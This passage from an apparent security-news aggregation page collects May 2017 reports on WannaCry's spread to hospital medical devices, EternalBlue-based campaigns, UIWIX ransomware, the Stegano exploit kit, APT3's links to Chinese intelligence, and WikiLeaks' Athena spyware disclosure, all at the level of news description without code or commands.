The Times, quoting 10 current and former American officials who spoke on condition of anonymity, described the intelligence breach as one of the worst in decades.

It said that even now intelligence officials are unsure whether the US was betrayed by a mole within the CIA or whether the Chinese hacked a covert system used by the CIA to communicate with foreign sources.

Of the damage inflicted on what had been one of the most productive US spy networks, however, there was no doubt: at least a dozen CIA sources were killed between late 2010 and the end of 2012, including one who was shot in front of colleagues in a clear warning to anyone else who might be spying, the Times reported.

In all, 18 to 20 CIA sources in China were either killed or imprisoned, according to two former senior American officials quoted. It was a grave setback to a network that, up to then, had been working at its highest level in years.

Those losses were comparable to the number of US assets lost in the Soviet Union and Russia because of the betrayals of two infamous spies, Aldrich Ames and Robert Hanssen, the report said.

Western espionage services have traditionally found it exceptionally hard to develop spy networks in China and Russia.

The CIA's mole hunt in China, following the severe losses to its network there, was intense and urgent. Nearly every employee of the US Embassy in Beijing was scrutinized at one point, the newspaper said.

Meantime, then-president Barack Obama's administration was demanding to know why its flow of intelligence from China had slowed.

The revelations come as the CIA seeks to determine how some of its highly sensitive documents were released two months ago by WikiLeaks, and the FBI examines possible links between the Donald Trump campaign and Russia.

Both the CIA and the FBI declined to comment.

Medical Devices infected by WannaCry Ransomware in US hospitals
21.5.2017 securityaffairs Ransomware

According to Forbes, the dreaded WannaCry ransomware has infected medical devices in at least two hospitals in the United States.
WannaCry infected 200,000 computers across 150 countries in a matter of hours last week, it took advantage of a tool named “Eternal Blue”, originally created by the NSA, which exploited a vulnerability present inside the earlier versions of Microsoft Windows. This tool was soon stolen by a hacking group named “Shadow Brokers” which leaked it to the world in April 2017.

Now security experts report the WannaCry ransomware has infected also medical devices as reported by Thomas Fox-Brewster on Forbes.

The journalist published an image of an infected medical device, likely a Bayer Medrad radiology equipment that is used to inject contrast agents inside the human body to aid in MRI scans.

“A source in the healthcare industry passed Forbes an image of an infected Bayer Medrad device in a U.S. hospital. The source did not say which specific hospital was affected, nor could they confirm what Bayer model was hacked. But it appears to be radiology equipment designed to help improve imaging.” states Forbes.”More specifically, it’s a device used for monitoring what’s known in the industry as a “power injector,” which helps deliver a “contrast agent” to a patient. Such agents consist of chemicals that improve the quality of magnetic resonance imaging (MRI) scans.”

wannacry ransomware medical devices
WannaCry ransomware on a Bayer radiology system – Source Forbes

The medical device was infected by the WannaCry ransomware because it was running on a version of the Windows Embedded operating system and supporting the SMBv1 protocol.

The name of the hospital where the device was infected was not reported to Forbes, Bayer confirmed it had received two reports from customers in the US.

According to a Bayern spokesperson, the affected hospitals faced limited problems.

“Operations at both sites were restored within 24 hours,” said the spokesperson. “If a hospital’s network is compromised, this may affect Bayer’s Windows-based devices connected to that network.”

Bayer plans to send out a Microsoft patch for its Windows-based devices “soon.”

According to Forbes, a source with the Health Information Trust Alliance (HITRUST) confirmed that WannaCry ransomware also infected and locked down Windows-based medical devices belonging to Siemens.

Siemens admitted that Healthineers products are vulnerable to WannaCry.

“Siemens Healthineers recognizes that some of its customers may be facing impacts from the recent major cyber-attack known as “WannaCry”.” reads the advisory published by Siemens. “Select Siemens Healthineers products may be affected by the Microsoft vulnerability being exploited by the WannaCry ransomware. The exploitability of any such vulnerability depends on the actual configuration and deployment environment of each product.”

Ransomware is a serious threat for the healthcare industry, this specific category of malware could infect systems at hospitals preventing the personnel from using any medical equipment and making ordinary operations (i.e. managing patient data or medical treatment schedules).

WannaCry affected 40 hospitals in the UK. let’s hope operators in the healthcare industry will understand the importance of cyber security for the industry.

Stegano Exploit Kit now uses the Diffie-Hellman Algorithm
21.5.2017 securityaffairs Exploit

The Stegano exploit kit, also known as Astrum, continues to evolve, recently its authors adopted the Diffie-Hellman algorithm to hinder analysis.
The Stegano exploit kit made was associated in the past with a massive AdGholas malvertising campaign that delivered malware, mostly Gozi and RAMNIT trojans. Experts at TrendMicro also observed the exploit kit in the Seamless malvertising campaign.

“Astrum’s recent activities feature several upgrades and show how it’s starting to move away from the more established malware mentioned above. It appears these changes were done to lay the groundwork for future campaigns, and possibly to broaden its use. With a modus operandi that deters analysis and forensics by abusing the Diffie-Hellman key exchange, it appears Astrum is throwing down the gauntlet.” reads the analysis published by Trend Micro.

Stegano exploit kit Diffie-Hellman

In March, the French research Kafeine reported the Stegano EK exploiting the information disclosure vulnerability tracked as CVE-2017-0022. Hackers exploited the flaw to evade antivirus detection and analysis.

A month later, the Stegano exploit kit was updated to prevent security researchers from replaying the malicious network traffic.

“We found that this anti-replay feature was designed to abuse the Diffie-Hellman key exchange—a widely used algorithm for encrypting and securing network protocols. Angler was first observed doing this back in 2015.” continues the analysis.

“Implementing the Diffie-Hellman key exchange prevents malware analysts and security researchers from getting a hold of the secret key Astrum uses to encrypt and decrypt their payloads. Consequently, obtaining the original payload by solely capturing its network traffic can be very difficult.”

According to the experts, the Astrum/ Stegano exploit kit includes exploit codes for a number of vulnerabilities in Adobe Flash, including the CVE-2015-8651 RCE, the CVE-2016-1019 RCE, and the out-of-bound read bug flaw tracked as CVE-2016-4117.

Experts highlighted that currently the Stegano Exploit Kit isn’t used to deliver malware and associated traffic is very low, both circumstances suggest we can soon observe a spike in its activity.

“It wouldn’t be a surprise if [Astrum/Stegano’s] operators turn it into an exclusive tool of the trade—like Magnitude and Neutrino did—or go beyond leveraging security flaws in Adobe Flash. Emulating capabilities from its predecessors such as fileless infections that can fingerprint its targets and deliver encrypted payloads shouldn’t be far off,” concluded Trend Micro.

Researchers found a link between the APT3 Threat Group and the Chinese Intelligence Agency
21.5.2017 securityaffairs APT

Security experts at threat intelligence firm Record Future have found a clear link between APT3 cyber threat group and China’s Ministry of State Security.
The curtain has been pulled back a little on the Chinese Intelligence Agency intelligence gathering structure — and it includes private security contractors and the network vendor supply chain.

In 2010, security vendor FireEye identified the Pirpi Remote Access Trojan (RAT) which exploited a then 0-day vulnerability in Internet Explorer versions 6, 7 and 8. FireEye named the threat group APT3 which has also been described as TG-0100, Buckeye, Gothic Panda, and UPS and described them as “one of the most sophisticated threat groups” being tracked at the time.

Since then, APT3 has been actively penetrating corporations and governments in the US, UK and most recently Hong Kong — and everyone has been trying to figure out who they are. APT3 functions very differently than 3LA, the former Chinese military hacking organization leading to the assumption that APT3 is not part of the military complex. At least not officially.

On May 9th, 2017, an unknown party using the alias ‘intrusiontruth’ published a series of blogs posts describing connections between the Pirpi RAT command and control components and shareholders of the Chinese security contractor Guangzhou Boyu Information Technology Company, aka Boyusec.

“On May 9, a mysterious group calling itself “intrusiontruth” identified a contractor for the Chinese Ministry of State Security (MSS) as the group behind the APT3 cyber intrusions.” states the analysis published by Recorder Future.

The names of two specific shareholders of Boyusec appear in the domain registration for the Pirpi C&C servers. This is particularly interesting because Boyusec supports the Chinese Ministry of State Security (MSS) by collecting civilian human intelligence. Think of them as an outsourcer for a government agency like the United States’ National Security Agency (NSA).

Also interesting is that in 2016 a Pentagon report described the relationship between Boyusec and network equipment manufacturer, Huawei. According to the report, the two companies were colluding to develop security equipment with embedded backdoors which would likely be used by Boyusec to compromise Huawei customers.

“In November 2016, the Washington Free Beacon reported that a Pentagon internal intelligence report had exposed a product that Boyusec and Huawei were jointly producing.” continues the analysis.”According to the Pentagon’s report, the two companies were working together to produce security products, likely containing a backdoor, that would allow Chinese intelligence “to capture data and control computer and telecommunications equipment.” The article quotes government officials and analysts stating that Boyusec and the MSS are “closely connected,” and that Boyusec appears to be a cover company for the MSS.”

To protect our networks, it is important to assess the threats. An important part of threat assessment is to anticipate the motivation of the attackers. APT3 has demonstrated above average skills and has been active for a long time. Add ties to the network vendor supply chain and you have the makings of a dangerous adversary. As part of the Chinese MSS structure you can start to guess at motivation. With this new information, it is a good time to reassess your threat model.

APT3 China

“The implications are clear and expansive. Recorded Future’s research leads us to attribute APT3 to the Chinese Ministry of State Security and Boyusec with a high degree of confidence. Boyusec has a Boyusec has a documented history of producing malicious technology and working with the Chinese intelligence services.” concludes the analysis.

Google Adds New Behavior-Based Malware Scanner To Every Android Device
20.5.2017 thehackernews Android
In order to keep its billions of users safe, Google has introduced another security defense for its Android devices, called Google Play Protect.
Google Play Protect, which is part of the Google Play Store app, uses machine learning and app usage analysis to weed out the dangerous and malicious apps, which have always been albatross around the tech giant's neck.
Since Google Play Protect actually comes with the Google Play Store, users do not need to install or activate this security feature separately.
Google Play Protect for Android devices consists:
App scanning
Anti-Theft Measures
Browser Protection
Play Protect's App Scanning Feature
Google Play Protect is an always-on service on devices which said to scan 50 billion apps each day across a billion Android devices to ensure they are safe.
Google already has a number of security measures in place to help keep your smartphones safe, including Verify Apps and its Bouncer service, but once apps are uploaded to the Play Store and installed on your device, Google does not have anything in place to monitor the behavior of those apps – something that most malware apps were abusing.
Running automatically in the background, Google Play Protect is actually built into devices, which will not only analyse apps before appearing on the Play Store, but also monitor them once installed on the device, including apps that have been installed from third-party stores as well.
For this, Google makes use of machine learning algorithms that automatically compares app behavior and distinguishes those acting abnormally, and if encounters any malicious app, it warns you or even disables the app to prevent further harm.
Google says it works around the clock to keep up with the latest threats
Google says the new machine learning system regularly updates to help Android ecosystem stay one step ahead of any potential threats by always looking out for "new risks, identifying potentially harmful apps and keeping them off your device or removing them."
Play Protect's Anti-Theft Measures
With the introduction of Google Play Protect, Android Device Manager has been replaced with Find My Device, use to locate lost and misplaced devices.
You can use the browser or any other device to remotely call, locate, and lock, your Android device or even erase the data to protect sensitive information remotely.
Find My Device is the same old solution, but Google included it into the Google Play Protect program.
Play Protect's Browser Protection
With Safe Browsing feature in Chrome, Play Protect lets users stay safe while browsing the Internet.
Usually, virus, malware and worm land on to your smartphones and computers via malicious web browsers. So, if you visit any website that is acting suspicious, Safe Browsing feature will warn you and block websites that feel sketchy or seems to be unsafe for you.
Google Play Protect service will be rolling out to Android devices over the coming weeks.

More Hacking Groups Found Exploiting SMB Flaw Weeks Before WannaCry
20.5.2017 thehackernews BigBrothers

Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools – allegedly belonged to the NSA's elite hacking team Equation Group – several hacking groups and individual hackers have started using them in their own way.
The April's data dump was believed to be the most damaging release by the Shadow Brokers till the date, as it publicly leaked lots of Windows hacking tools, including dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers have identified multiple different campaigns exploiting Windows SMB vulnerability (CVE-2017-0143), called Eternalblue, which has already compromised hundreds of thousands of computers worldwide.
I have been even confirmed by multiple sources in hacking and intelligence community that there are lots of groups and individuals who are actively exploiting Eternalblue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So, it would not be surprised to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting Eternalblue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns are using a similar attack flow, wherein attackers initially infect the target machine with malware via different attack vectors, then uses Eternalblue to infect other devices in the same network and finally inject a stealthy thread inside legitimate applications, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread began downloading multiple malicious modules and then access SQLite DLL to retrieve users' saved login credentials from Mozilla's FireFox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But only instead of remaining purely in-memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, which is based on ‘Agony rootkit’ to make persistent.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
These malicious campaigns went unnoticed for weeks because unlike WannaCry, the purpose of these attacks was different, holding affected systems for a long time by achieving persistent and stealing credentials to regain access.
The recent example is of "Adylkuzz," a recently-discovered stealthy cryptocurrency-mining malware that was also using Windows SMB vulnerability at least two weeks before the outbreak of WannaCry ransomware attacks.
These attacks are just the beginning, as attacks like WannaCry have not been completely stopped and given the broad impact of the NSA exploits, hackers and cyber criminals are curiously waiting for the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Since the attackers are currently waiting for new zero-days to exploit, there is very little users can do to protect themselves from the upcoming cyber attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.

WannaCry Does Not Fit North Korea's Style, Interests: Experts

20.5.2017 securityweek Ransomware
Some experts believe that, despite malware code similarities, the WannaCry ransomware is unlikely to be the work of North Korea, as the attack does not fit the country’s style and interests.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

The first clue that the WannaCry ransomware may have been created by North Korea was uncovered by Google researcher Neel Mehta. The expert noticed that a variant of WannaCry making the rounds in February, when the threat was less known, had code similarities with a tool used by the North Korea-linked cyber espionage group named Lazarus. The code in question was removed from later versions of the ransomware.

Security firms such as Symantec and Kaspersky confirmed the connection to Lazarus, and Kaspersky said it was “improbable” that this was a false flag. Even the Shadow Brokers, the group that leaked the Equation Group exploits leveraged by WannaCry, attributed the attack to North Korea.

However, not everyone agrees that North Korea is behind WannaCry. The threat intelligence team at endpoint security firm Cybereason believes North Korea is unlikely to be behind the campaign.

“Nothing in North Korea’s past cyber campaigns or in their conventional military and foreign policy fit this mold. Looking at national identity, foreign policy and strategic messaging will greatly reduce the likelihood that Pyongyang ordered this campaign,” the company said in a blog post on Friday.

Related: Industry Reactions to WannaCry Ransomware Attacks

One reason is that North Korea, guided by its self-reliance ideology, has never used commodity malware or generic tools in its cyberattacks. All the tools and exploits leveraged by the Lazarus group have been custom-built, Cybereason said.

Another reason for which North Korea is unlikely to be behind the WannaCry ransomware attack is the fact that China and Russia, two of the country’s biggest allies, were among the most affected. Furthermore, some of Pyongyang’s biggest enemies, including the U.S., Japan and South Korea, had fairly low infection rates.

The Lazarus group has been linked to several high-profile operations, including the 2014 attack on Sony Pictures, the 2016 attack on Bangladesh’s central bank, which resulted in the theft of $81 million, and some more recent campaigns targeting financial institutions. While North Korea has never officially taken responsibility for these attacks, Cybereason pointed out that the country has always left clear hints of its involvement as a way of sending a strategic message.

Since Lazarus has been linked to several profit-driven attacks, there is a possibility that the WannaCry attacks had a similar goal. However, experts believe that if North Korea was behind the campaign and the goal was to make money, it would have likely set up a better payment system, it wouldn’t have bothered removing the Lazarus code from the final version of WannaCry, and it wouldn’t have neglected to register the kill switch domain that allowed researchers to disrupt the campaign.

Cybereason is not the only company that is skeptical of North Korea’s involvement in the WannaCry attack. Bogdan Botezatu, senior e-threat specialist at Bitdefender, also believes that the scenario in which a state-sponsored actor – especially one as sophisticated as Lazarus – would switch to ransomware is unlikely.

“The attack wasn't targeted and there was no clear gain for them,” Botezatu told SecurityWeek. “It's doubtful they would use such a powerful exploit for anything else than espionage.”

The expert pointed out that Bitdefender took WannaCry apart and found only the worm module and the ransomware component – nothing to indicate that the malware could be used for anything else.

Stealth Backdoor Abused NSA Exploit Before WannaCrypt

20.5.2017 securityweek Ransomware
In the aftermath the WannaCry ransomware outbreak, security researchers discovered numerous attacks that have been abusing the same EternalBlue exploit for malware delivery over the past several weeks.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution
The effects of the militarization of the cyberspace are dangerous and unpredictable. A malicious code developed by a government could create serious problems for the Internet users, the recent WannaCry massive attack demonstrates it that used the EternalBlue Exploit to spread.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal security early this week while investigating on WannaCry.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated the UIWIX and confirmed that UIWIX is a stealthier threat that is hard to analyze, it doesn’t write files on the infected machine and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system,

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below a summary of WannaCry and UIWIX’s notable features reported by Trend Micro:

WannaCry UIWIX
Attack Vectors SMB vulnerabilities (MS17-010), TCP port 445 SMB vulnerabilities (MS17-010), TCP port 445
File Type Executable (EXE) Dynamic-link Library (DLL)
Appended extension {original filename}.WNCRY ._{unique id}.UIWIX
Autostart and persistence mechanisms Registry None
Anti-VM, VM check, or anti-sandbox routines None Checks presence of VM and sandbox-related files or folders
Network activity On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser Uses mini-tor.dll to connect to .onion site
Exceptions (doesn’t execute if it detects certain system components) None Terminates itself if found running in Russia, Kazakhstan, and Belarus
Exclusions (directories or file types it doesn’t encrypt) Avoids encrypting files in certain directories Avoids encrypting files in two directories, and files with certain strings in their file name
Network scanning and propagation Yes (worm-like propagation) No
Kill switch Yes No
Autostart and persistence mechanisms Registry None
Number of targeted file types 176 All files in the affected system except those in its exclusion list
Shadow copies deletion Yes No
Languages supported (ransom notes, payment site) Multilingual (27) English only
UIWIX malware

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

The network activity of the malware leverages mini-tor.dll to connect to .onion site, meanwhile, WannaCry was scanning the Internet for random IP addresses to check if it has an open port 445 and it was connecting to .onion site using the Tor browser.

Most evident differences between WannaCry and UIWIX are:

UIWIX doesn’t implement the worm spreading capabilities;
UIWIX doesn’t include a kill-switch;
UIWIX uses a different Bitcoin address for each victim;
Clearly, the WannaCry attack represents a great opportunity for cyber crime ecosystem, every time a new flaw was discovered cooks try to exploit is in the attack in the wild, for example including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that exploited the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”

WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for AfterMidnight and Assassin malware platforms, today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation related to a spyware framework dubbed Dubbed Athena /Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents it is possible to discover that any Windows systems could be infected by the two spyware, Athena works for XP through Windows 10 and Hera for Windows 8 through Windows 10.

The Athena / Hera malware were used by the CIA to take remote control over the infected Windows machines remotely.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32- bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python, is seems to be dated back August 2015, if confirmed it is worrying news because Microsoft released Windows 10 in July 2015.

Athena is the result of a joint work of CIA developers and peers at cyber security firm Siege Technologies that is specialized in offensive cyber security.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.

CIA Athena spyware

The documents leaked by Wikileaks reveals that ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

However, WikiLeaks has not provided any detail about the operations being conducted by the agency using Athena, but it is not hard to imagine how the intelligence agency would be using this program to spy on their targets.

Below the list of the mail dumps leaked by WikiLeaks:

The Year Zero that revealed CIA hacking exploits for hardware and software.
Weeping Angel spying tool to hack Samsung smart TV and use them as
The Dark Matter dump is containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
The Scribbles Project for document tracking.
Archimedes man-in-the-middle (MitM) attack tool.
AfterMidnight and Assassin malware platforms.

North Korea Denies Role in Global Cyberattack

20.5.2017 securityweek Attack
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.